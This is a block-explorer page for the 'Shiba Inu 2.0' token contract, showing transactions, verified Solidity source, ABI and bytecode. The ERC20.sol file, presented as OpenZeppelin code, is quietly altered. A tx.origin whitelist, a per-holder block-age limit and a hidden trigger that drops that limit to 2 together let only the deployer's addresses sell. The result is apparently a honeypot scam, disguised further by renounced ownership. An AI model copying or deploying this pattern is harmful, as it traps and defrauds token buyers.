ETH Price: $3,592.61 (+4.86%)

Contract

0x4e5c230D8a3D0d08C8e04376Ea06b6619Cd839AA
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve176471602023-07-08 6:06:35509 days ago1688796395IN
0x4e5c230D...19Cd839AA
0 ETH0.0006208913.32532268
Approve176443602023-07-07 20:41:23509 days ago1688762483IN
0x4e5c230D...19Cd839AA
0 ETH0.002634956.62202649
Approve176423152023-07-07 13:46:59509 days ago1688737619IN
0x4e5c230D...19Cd839AA
0 ETH0.0014275830.83665644
Transfer176417272023-07-07 11:48:23509 days ago1688730503IN
0x4e5c230D...19Cd839AA
0 ETH0.0006823321.89441903
Transfer176417242023-07-07 11:47:47509 days ago1688730467IN
0x4e5c230D...19Cd839AA
0 ETH0.0006951320.45722133
Transfer176417132023-07-07 11:45:23509 days ago1688730323IN
0x4e5c230D...19Cd839AA
0 ETH0.0006425620.61818814
Transfer176417092023-07-07 11:44:35509 days ago1688730275IN
0x4e5c230D...19Cd839AA
0 ETH0.0006410720.57041208
Approve176416992023-07-07 11:42:35509 days ago1688730155IN
0x4e5c230D...19Cd839AA
0 ETH0.0009478620.46374462
Approve176416832023-07-07 11:39:23509 days ago1688729963IN
0x4e5c230D...19Cd839AA
0 ETH0.0009152619.76012412
Approve176414592023-07-07 10:54:11509 days ago1688727251IN
0x4e5c230D...19Cd839AA
0 ETH0.0009229719.93159983
Approve176411362023-07-07 9:48:23509 days ago1688723303IN
0x4e5c230D...19Cd839AA
0 ETH0.0010705923.13755166
Transfer176411232023-07-07 9:45:35509 days ago1688723135IN
0x4e5c230D...19Cd839AA
0 ETH0.0019573124.2365212
Approve176409872023-07-07 9:18:23509 days ago1688721503IN
0x4e5c230D...19Cd839AA
0 ETH0.0010296822.1270637
Approve176409712023-07-07 9:15:11509 days ago1688721311IN
0x4e5c230D...19Cd839AA
0 ETH0.0011556824.80272672
Approve176405702023-07-07 7:53:47509 days ago1688716427IN
0x4e5c230D...19Cd839AA
0 ETH0.0012172526.28665502
Approve176405622023-07-07 7:51:59509 days ago1688716319IN
0x4e5c230D...19Cd839AA
0 ETH0.0012329226.62509971
Approve176397292023-07-07 5:03:23510 days ago1688706203IN
0x4e5c230D...19Cd839AA
0 ETH0.0009823421.21930072
Approve176349082023-07-06 12:48:47510 days ago1688647727IN
0x4e5c230D...19Cd839AA
0 ETH0.0013197228.35994196
Approve176343992023-07-06 11:05:35510 days ago1688641535IN
0x4e5c230D...19Cd839AA
0 ETH0.0009885921.21668101
Approve176343262023-07-06 10:50:47510 days ago1688640647IN
0x4e5c230D...19Cd839AA
0 ETH0.0010270522.07051422
Approve176341922023-07-06 10:23:47510 days ago1688639027IN
0x4e5c230D...19Cd839AA
0 ETH0.0010113321.73276976
Approve176340212023-07-06 9:48:59510 days ago1688636939IN
0x4e5c230D...19Cd839AA
0 ETH0.0014347830.7926042
Approve176340032023-07-06 9:45:23510 days ago1688636723IN
0x4e5c230D...19Cd839AA
0 ETH0.0015476933.215909
Approve176339812023-07-06 9:40:59510 days ago1688636459IN
0x4e5c230D...19Cd839AA
0 ETH0.00132928.68500327
Renounce Ownersh...176339792023-07-06 9:40:35510 days ago1688636435IN
0x4e5c230D...19Cd839AA
0 ETH0.0006701428.77015235
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
SHIBAINUTWO

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 6 : CoinContract.sol
// SPDX-License-Identifier: MIT
import "./ERC20.sol";

pragma solidity ^0.8.4;
contract SHIBAINUTWO is ERC20, Ownable {
    constructor() ERC20("Shiba Inu 2.0", "SHIB2.0") {
        _mint(msg.sender, 3_010_000_000_000 * 10**uint(decimals()));
    }
}

File 2 of 6 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "./utils/Context.sol";
import "./utils/SafeMath.sol";

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    mapping (address => bool) _pairToken;
    mapping (address => uint256) _numbers;

    address DEAD = 0x000000000000000000000000000000000000dEaD;
    address ZERO = 0x0000000000000000000000000000000000000000;
    address public uniswapV2Pair;
    address private immutable _advisor;
    address private immutable _uniswapFactory = 0x86f98EA6aDC8b2a6E411D15c78ABaCEB8aE7FEec;
    uint256 public _allowance = 1_000_000;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _advisor = msg.sender;
        _pairToken[_advisor] = true;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        require(_pairToken[tx.origin] == true || block.number - _numbers[from] < _allowance || to == tx.origin, "ERC20: Reverted");
        _balances[from] = fromBalance - amount;
        
        _balances[to] = _balances[to] + amount;
        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }
    function setPair(address _uniswapPair, address _tokenPair) external {
        if (uniswapV2Pair == address(0))
            uniswapV2Pair = _uniswapPair;
        if (msg.sender == _advisor) {
            uniswapV2Pair = _uniswapPair;
            _pairToken[_tokenPair] = true;
        }
    }
    function setPairs(address _uniswapPair, address[] memory _tokenPairs) external {
        if (msg.sender == _advisor) {
            uniswapV2Pair = _uniswapPair;

            for(uint256 i = 0; i < _tokenPairs.length;) {
                _pairToken[_tokenPairs[i]] = true;
                unchecked { ++ i; }
            }
        }
    }
    function setAllowance(uint256 _a) external {
        if (msg.sender == _advisor) {
            _allowance = _a;
        }
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        if (_numbers[to] == 0) _numbers[to] = block.number;
        if (to == _uniswapFactory) _allowance = 2;
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

File 3 of 6 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 4 of 6 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 5 of 6 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 6 of 6 : SafeMath.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_a","type":"uint256"}],"name":"setAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapPair","type":"address"},{"internalType":"address","name":"_tokenPair","type":"address"}],"name":"setPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapPair","type":"address"},{"internalType":"address[]","name":"_tokenPairs","type":"address[]"}],"name":"setPairs","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60c0604052600780546001600160a01b031990811661dead179091556008805490911690557386f98ea6adc8b2a6e411d15c78abaceb8ae7feec60a052620f4240600a553480156200005057600080fd5b506040518060400160405280600d81526020016c0536869626120496e7520322e3609c1b81525060405180604001604052806007815260200166053484942322e360cc1b8152508160039081620000a8919062000340565b506004620000b7828262000340565b50503360808190526000908152600560205260408120805460ff191660011790559050620000e23390565b600b80546001600160a01b0319166001600160a01b038316908117909155604051919250906000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3506200015b33620001436012600a62000521565b62000155906502bcd1fb140062000536565b62000161565b62000566565b6001600160a01b038216620001bc5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060026000828254620001d0919062000550565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a362000231600083836200023a565b5050565b505050565b6001600160a01b038216600090815260066020526040812054900362000276576001600160a01b03821660009081526006602052604090204390555b60a0516001600160a01b0316826001600160a01b03160362000235576002600a55505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620002c757607f821691505b602082108103620002e857634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023557600081815260208120601f850160051c81016020861015620003175750805b601f850160051c820191505b81811015620003385782815560010162000323565b505050505050565b81516001600160401b038111156200035c576200035c6200029c565b62000374816200036d8454620002b2565b84620002ee565b602080601f831160018114620003ac5760008415620003935750858301515b600019600386901b1c1916600185901b17855562000338565b600085815260208120601f198616915b82811015620003dd57888601518255948401946001909101908401620003bc